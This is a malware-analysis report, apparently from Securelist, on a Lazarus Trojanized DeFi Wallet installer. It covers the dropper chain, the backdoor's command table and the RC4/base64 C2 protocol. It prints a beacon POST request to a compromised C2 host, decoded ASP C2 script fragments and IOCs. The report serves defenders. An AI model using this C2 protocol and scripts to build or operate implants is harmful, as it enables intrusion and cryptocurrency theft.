# Lazarus Trojanized DeFi app for delivering malware

**securelist.com/lazarus-trojanized-defi-app/106195/**

Authors

GReAT

For the Lazarus threat actor, financial gain is one of the prime motivations, with a particular emphasis on the cryptocurrency business. As the
price of cryptocurrency surges, and the popularity of non-fungible token (NFT) and decentralized finance (DeFi) businesses continues to swell,
the Lazarus group’s targeting of the financial industry keeps evolving.

We recently discovered a Trojanized DeFi application that was compiled in November 2021. This application contains a legitimate program
called DeFi Wallet that saves and manages a cryptocurrency wallet, but also implants a malicious file when executed. This malware is a fullfeatured backdoor containing sufficient capabilities to control the compromised victim. After looking into the functionalities of this backdoor, we
discovered numerous overlaps with other tools used by the Lazarus group.

The malware operator exclusively used compromised web servers located in South Korea for this attack. To take over the servers, we worked
[closely with the KrCERT and, as a result of this effort, we had an opportunity to investigate a Lazarus group C2 server. The threat actor](https://www.krcert.or.kr/main.do)
configured this infrastructure with servers set up as multiple stages. The first stage is the source for the backdoor while the goal of the second
stage servers is to communicate with the implants. This is a common scheme used in Lazarus infrastructure.

## Background

In the middle of December 2021, we noticed a suspicious file uploaded to VirusTotal. At first glance, it looked like a legitimate application
related to decentralized finance (DeFi); however, looking closer we found it initiating an infection scheme. When executed, the app drops both
a malicious file and an installer for a legitimate application, launching the malware with the created Trojanized installer path. Then, the
spawned malware overwrites the legitimate application with the Trojanized application. Through this process, the Trojanized application gets
removed from the disk, allowing it to cover its tracks.


-----

**_Infection timeline_**

## Initial infection

[While it’s still unclear how the threat actor tricked the victim into executing the Trojanized application (0b9f4612cdfe763b3d8c8a956157474a),](https://opentip.kaspersky.com/0b9f4612cdfe763b3d8c8a956157474a/?utm_source=SL&utm_medium=SL&utm_campaign=SL)
we suspect they sent a spear-phishing email or contacted the victim through social media. The hitherto unknown infection procedure starts
with the Trojanized application. This installation package is disguised as a DeFi Wallet program containing a legitimate binary repackaged with
the installer.

Upon execution, it acquires the next stage malware path (C:\ProgramData\Microsoft\GoogleChrome.exe) and decrypts it with a one-byte XOR
(Key: 0x5D). In the process of creating this next malware stage, the installer writes the first eight bytes including the ‘MZ’ header to the file
GoogleChrome.exe and pushes the remaining 71,164 bytes from the data section of the Trojanized application. Next, the malware loads the
resource CITRIX_MEETINGS from its body and saves it to the path C:\ProgramData\Microsoft\CM202025.exe. The resulting file is a legitimate
DeFi Wallet application. Eventually, it executes the previously created malware with its file name as a parameter:

C:\ProgramData\Microsoft\GoogleChrome.exe “[current file name]”

**_Malware creation diagram_**

## Backdoor creation

[The malware (d65509f10b432f9bbeacfc39a3506e23) generated by the above Trojanized application is disguised as a benign instance of the](https://opentip.kaspersky.com/d65509f10b432f9bbeacfc39a3506e23/?utm_source=SL&utm_medium=SL&utm_campaign=SL)
Google Chrome browser. Upon launch, the malware checks if it was provided with one argument before attempting to copy the legitimate
application “C:\ProgramData\Microsoft\CM202025.exe” to the path given as the command line parameter, which means overwriting the original
Trojanized installer, almost certainly in an attempt to conceal its prior existence. Next, the malware executes the legitimate file to deceive the
victim by showing its benign installation process. When the user executes the newly installed program, it shows the DeFi Wallet software built
with the public source code[1].


-----

**_Screenshot of the manipulated application_**

Next, the malware starts initializing the configuration information. The configuration shows the structure shown in the table below, consisting of
flags, C2 server addresses, victim identification value, and time value. As the structure suggests, this malware can hold up to five C2
addresses, but only three C2 servers are included in this case.

**Offset** **Length(bytes)** **Description**

0x00 4 Flag for starting C2 operation

0x04 4 Random value to select C2 server

0x08 4 Random value for victim identifier

0x0C 0x208 C2 server address

0x214 0x208 C2 server address

0x41C 0x208 C2 server address

0x624 0x208 C2 server address

0x82C 0x208 C2 server address

0xA34 0x464 Buffer for system information

0xE98 0x400 Full cmd.exe path

0x1298 0x400 Temporary folder path

0x1698 8 Time to start backdoor operation

0x16A0 4 Time interval

0x16A4 4 Flag for gathering logical drives

0x16A8 8 Flag for enumerating session information

0x16B0 8 The time value for gathering logical drive and session information


-----

e a a e a do y c ooses a C se e add ess a d se ds a beaco s g a to t s s g a s a a d coded 0 60 9 9 O
without encryption; the response data returned from the C2 carries the same value. If the expected value from the C2 server is received, the
malware starts its backdoor operation.

Following further communication with the C2, the malware encrypts data by a predefined method. The encryption is done via RC4 and the
hard-coded key 0xD5A3 before additionally being encoded with base64.

The malware generates POST parameters with hard-coded names. The request type (msgID), victim identification value, and a randomly
generated value are merged into the ‘jsessid’ parameter. It also uses the ‘cookie’ parameter to store four randomly generated four-byte values.
These values are again encrypted with RC4 and additionally base64 encoded. Based on our investigation of the C2 script, we observed this
malware not only uses a parameter named ‘jsessid’, but also ‘jcookie’ as well.

**_Structure of ‘jsessid’ parameter_**

The following HTTP request shows the malware attempting to connect to the C2 with the request type ’60d49d98′ and a randomly generated
cookie value.


1

2

3

4

5

6

7

8


POST /include/inc.asp HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR
3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)

Host: emsystec.com

Content-Length: 80

Cache-Control: no-cache

jsessid=60d49d980163be8f00019f91&cookie=29f23f917ab01aa8lJ3UYA==2517757b7dfb47f1


Depending on the response from the C2, the malware performs its instructed backdoor task. It carries various functionalities to gather system
information and control the victim machine.

**Command** **Description**

0x60D49D97 Set time configuration with the current time interval (default is 10) value

0x60D49D9F Set time configuration with delivered data from C2 server

0x60D49DA0 Gather system information, such as IP address, computer name, OS version, CPU architecture

0x60D49DA1 Collect drive information including type and free size

0x60D49DA2 Enumerate files (with file name, size, time)

0x60D49DA3 Enumerate processes

0x60D49DA4 Terminate process

0x60D49DA5 Change working directory

0x60D49DA6 Connect to a given IP address


-----

0x60D49DA7 File timestamping

0x60D49DA8 Execute Windows command

0x60D49DA9 Securely delete a file

0x60D49DAA Spawn process with CreateProcessW API

0x60D49DAB Spawn process with CreateProcessAsUserW API

0x60D49DAC Spawn process with high integrity level

0x60D49DAD Download file from C2 server and save to given file path

0x60D49DAE Send file creation time and contents

0x60D49DAF Add files to .cab file and send it to the C2 server

0x60D49DB0 Collect a list of files at the given path

0x60D49DB1 Send the configuration to the C2 server

0x60D49DB2 Receive new configuration from the C2 server

0x60D49DB3 Set config to the current time

0x60D49DB4 Sleep 0.1 seconds and continue

## Infrastructure

[Lazarus only used compromised web servers located in South Korea in this campaign. As a result of working closely with the KrCERT in taking](https://www.krcert.or.kr/main.do)
down some of them, we had a chance to look into the corresponding C2 script from one of the compromised servers. The script described in
this section was discovered in the following path:

1 http://bn-cosmo[.]com/customer/board_replay[.]asp

The script is a VBScript.Encode ASP file, commonly used by the Lazarus group in their C2 scripts. After decoding, it shows the string
’60d49d95′ as an error response code, whereas the string ’60d49d94′ is used as a success message. In addition, the connection history is
saved to the file ‘stlogo.jpg‘ and the C2 address for the next stage is stored in the file ‘globals.jpg‘ located in the same folder.

**_Configuration of C2 script_**

This script checks what value is delivered in the ‘jcookie’ parameter and, if it’s longer than 24 characters, it extracts the first eight characters as
msgID. Depending on the msgID value, it calls different functions. The backdoor command and command execution result delivered by the
backdoor get stored to global variables. We have seen this scheme in operation before with the Bookcode[2] cluster. This script uses the
following variables as flags and buffers to deliver data and commands between the backdoor and a second stage C2 server:

lFlag: flag to signal that there is data to deliver to the backdoor
lBuffer: buffer to store data to be later sent to the backdoor
tFlag: flag to signal that there is a response from the backdoor
tBuffer: buffer to store incoming data from the backdoor


**msgID** **Function**
**name**


**Description**


60d49d98 TFConnect Save the ‘TID’ value (victim identifier) to the log file, send ‘jcookie’ value with the client’s IP address after acquiring
the next stage C2 address from the config file (globals.jpg). Forward the response from the next stage server to
the client.


-----

60d49d99 TConnect Deliver the command to the backdoor:
If the lFlag is ‘true’, send lBuffer to the client. Reset ‘lBuffer’ and set lFlag to ‘false’. Otherwise, reset ‘tBuffer’ and
set tFlag to ‘false’.

60d49d9a LConnect Send the command and return the command execution result:
Set ‘ lBuffer’ value to ‘jcookie’ parameter, delivering ‘tBuffer’ to the client.

60d49d9c Check Retrieve host information (computer name, OS version). Delete the configuration file, which saves the C2’s next
stage address, if it exists. Then save the new configuration with delivered data through the ‘jcookie’ parameter.

60d49d9d LogDown Deliver log file after base64 encoding and then delete it.

the others N/A Write connections with unknown/unexpected msgID (request type) data to a log file, entries are tagged with
_‘xxxxxxxx’._

## Attribution

We believe with high confidence that the Lazarus group is linked to this malware as we identified similar malware in the CookieTime cluster.
[The CookieTime cluster, called LCPDot by JPCERT, was a malware cluster that was heavily used by the Lazarus group until recently. We’ve](https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html)
seen Lazarus group target the defence industry using the CookieTime cluster with a job opportunity decoy. We have already published several
reports about this cluster to our Threat Intelligence Service customers, and we identified a Trojanized Citrix application
[(5b831eaed711d5c4bc19d7e75fcaf46e) with the same code signature as the CookieTime malware. The backdoor discovered in the latest](https://opentip.kaspersky.com/5b831eaed711d5c4bc19d7e75fcaf46e/?utm_source=SL&utm_medium=SL&utm_campaign=SL)
investigation, and the previously discovered Trojanized application, are almost identical. They share, among other things, the same C2
communication method, backdoor functionalities, random number generation routine and the same method to encrypt communication data.
[Also, this malware was mentioned in an article by Ahnlab discussing connections with the CookieTime (aka LCPDot) malware.](https://cn.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf)

**_Same backdoor switch of old CookieTime malware_**

In turn, we identified that the CookieTime cluster has ties with the Manuscrypt and ThreatNeedle clusters, which are also attributed to the
Lazarus group. This doesn’t only apply to the backdoor itself, but also to the C2 scripts, which show several overlaps with the ThreatNeedle
cluster. We discovered almost all function and variable names, which means the operators recycled the code base and generated
corresponding C2 scripts for the malware.


**ThreatNeedle C2 script from**

roit.co[.]kr/xyz/adminer/edit_fail_decoded.asp


**C2 script of this case**


-----

1

2

3

4

5

6

7

8

9

10

11

12


functIon getIpAddress()

On ErroR resume next

Dim ip

ip=Request.SErVervariables("HTTP_CLIENT_IP")

If ip=""THen

Ip=ReQUest.ServervaRiAbLes("HTTP_X_FORWARDED_FOR")

If ip=""ThEn

ip=request.ServerVaRiables("REMOTE_ADDR")

End If

End if

GEtIpAdDress=ip

End FuNction


1

2

3

4

5

6

7

8

9

10

11

12


fUnctioN GetIpAddress()

ON Error Resume Next

Dim iP

ip=ReqUest.ServerVaRiables("HTTP_CLIENT_IP")

If ip=""THEn

iP=Request.SErverVariaBleS("HTTP_X_FORWARDED_FOR")

If ip=""then

ip=reQuest.ServErVariables("REMOTE_ADDR")

EnD IF

EnD If

GEtipAddreSs=ip

End FUnction


**_Almost identical scripts to fetch IP address of client_**


**ThreatNeedle C2 script from:**

edujikim[.]com/pay_sample/INIstart.asp


**C2 script of this case**


1

2

3

4

5

6

7

8

9

10

11

12

13


Sub writeDataToFile(strFileName, byData)

Dim objFSO, objFile, strFilePath

Const ForAppending = 8

strFilePath = Server.MapPath(".") & "\" &

strFileName

Set objFSO =

CreateObject("Scripting.FileSystemObject")

Set objFile =

objFSO.OpenTextFile(strFilePath,

ForAppending, True)

objFile.Write byData

objFile.Close

End Sub


1

2

3

4

5

6

7

8

9

10


Sub WritedatA(filepath,byData)

dim objFSO,oBJFile

ConSt ForAppEnDing=8

Set

objFsO=CreateObject("Scripting.FileSystemObject")

SeT

objFIle=objFso.OpENTextFile(filepaTh,FoRAppending,True)

objFilE.Write ByDatA

objFIle.CLose

EnD Sub


**_Similar scripts to save data to a file_**

## Conclusions

[In a previous investigation we discovered that the BlueNoroff group, which is also linked to Lazarus, compromised another DeFi wallet](https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/)
program called MetaMask. As we can see in the latest case, the Lazarus and BlueNoroff groups attempt to deliver their malware without
drawing attention to it and have evolved sophisticated methods to lure their victims. The cryptocurrency and blockchain-based industry
continues to grow and attract high levels of investment. For this reason, we strongly believe Lazarus’s interest in this industry as a major
source of financial gain will not diminish any time soon.

## Indicators of Compromise


-----

**oja** **ed** **e** **app cat o**
[0b9f4612cdfe763b3d8c8a956157474a  DeFi-App.exe](https://opentip.kaspersky.com/0b9f4612cdfe763b3d8c8a956157474a/?utm_source=SL&utm_medium=SL&utm_campaign=SL)

**Dropped backdoor**
[d65509f10b432f9bbeacfc39a3506e23  %ProgramData%\Microsoft\GoogleChrome.exe](https://opentip.kaspersky.com/d65509f10b432f9bbeacfc39a3506e23/?utm_source=SL&utm_medium=SL&utm_campaign=SL)

**Similar backdoor**
[a4873ef95e6d76856aa9a43d56f639a4](https://opentip.kaspersky.com/a4873ef95e6d76856aa9a43d56f639a4/?utm_source=SL&utm_medium=SL&utm_campaign=SL)
[d35a9babbd9589694deb4e87db222606](https://opentip.kaspersky.com/d35a9babbd9589694deb4e87db222606/?utm_source=SL&utm_medium=SL&utm_campaign=SL)
[70bcafbb1939e45b841e68576a320603](https://opentip.kaspersky.com/70bcafbb1939e45b841e68576a320603/?utm_source=SL&utm_medium=SL&utm_campaign=SL)
[3f4cf1a8a16e48a866aebd5697ec107b](https://opentip.kaspersky.com/3f4cf1a8a16e48a866aebd5697ec107b/?utm_source=SL&utm_medium=SL&utm_campaign=SL)
[b7092df99ece1cdb458259e0408983c7](https://opentip.kaspersky.com/b7092df99ece1cdb458259e0408983c7/?utm_source=SL&utm_medium=SL&utm_campaign=SL)
[8e302b5747ff1dcad301c136e9acb4b0](https://opentip.kaspersky.com/8e302b5747ff1dcad301c136e9acb4b0/?utm_source=SL&utm_medium=SL&utm_campaign=SL)
[d90d267f81f108a89ad728b7ece38e70](https://opentip.kaspersky.com/d90d267f81f108a89ad728b7ece38e70/?utm_source=SL&utm_medium=SL&utm_campaign=SL)
[47b73a47e26ba18f0dba217cb47c1e16](https://opentip.kaspersky.com/47b73a47e26ba18f0dba217cb47c1e16/?utm_source=SL&utm_medium=SL&utm_campaign=SL)
[77ff51bfce3f018821e343c04c698c0e](https://opentip.kaspersky.com/77ff51bfce3f018821e343c04c698c0e/?utm_source=SL&utm_medium=SL&utm_campaign=SL)

**First stage C2 servers (Legitimate, compromised)**
hxxp://emsystec[.]com/include/inc[.]asp
hxxp://www[.]gyro3d[.]com/common/faq[.]asp
hxxp://www[.]newbusantour[.]co[.]kr/gallery/left[.]asp
hxxp://ilovesvc[.]com/HomePage1/Inquiry/privacy[.]asp
hxxp://www[.]syadplus[.]com/search/search_00[.]asp
hxxp://bn-cosmo[.]com/customer/board_replay[.]asp

**Second stage C2 servers (Legitimate, compromised)**
hxxp://softapp[.]co[.]kr/sub/cscenter/privacy[.]asp
hxxp://gyro3d[.]com/mypage/faq[.]asp

## MITRE ATT&CK Mapping

This table contains all the TTPs identified in the analysis of the activity described in this report.

**Tactic** **Technique** **Technique Name**

**Execution** **T1204.002** **User Execution: Malicious File**

Use Trojanized application to drop malicious backdoor

**Persistence** **T1547.001** **Boot or Logon Autostart Execution: Registry Run Keys /**
**Startup Folder**

Register dropped backdoor to the Run registry key


**Defense**
**Evasion**


**T1070.004** **Indicator Removal on Host: File Deletion**

The Trojanized application overwrites itself after creating a
legitimate application to remove its trace


**T1070.006** **Indicator Removal on Host: Timestomp**

Backdoor capable of timestomping specific files

**Discovery** **T1057** **Process Discovery**

List running processes with backdoor

**T1082** **System Information Discovery**

Gather IP address, computer name, OS version, and
CPU architecture with backdoor

**T1083** **File and Directory Discovery**

List files in some directories with backdoor

**T1124** **System Time Discovery**

Gather system information with backdoor


**Command**
**and Control**


**T1071.001** **Application Layer Protocol: Web Protocols**

Use HTTP as C2 channel with backdoor


**T1573.001** **Encrypted Channel: Symmetric Cryptography**

Use RC4 encryption and base64 with backdoor

**Exfiltration** **T1041** **Exfiltration Over C2 Channel**

Exfiltrates gathered data over C2 channels with backdoor


-----

ttps //g t ub co / e C /app

[2] APT Intel report: Lazarus Covet Covid19 Related Intelligence

[Backdoor](https://securelist.com/tag/backdoor/)
[Financial malware](https://securelist.com/tag/financial-malware/)
[Google Chrome](https://securelist.com/tag/google-chrome/)
[Lazarus](https://securelist.com/tag/lazarus/)
[Malware Technologies](https://securelist.com/tag/malware-technologies/)
[Trojan](https://securelist.com/tag/trojan/)

Authors

GReAT

Lazarus Trojanized DeFi app for delivering malware

Your email address will not be published. Required fields are marked *


-----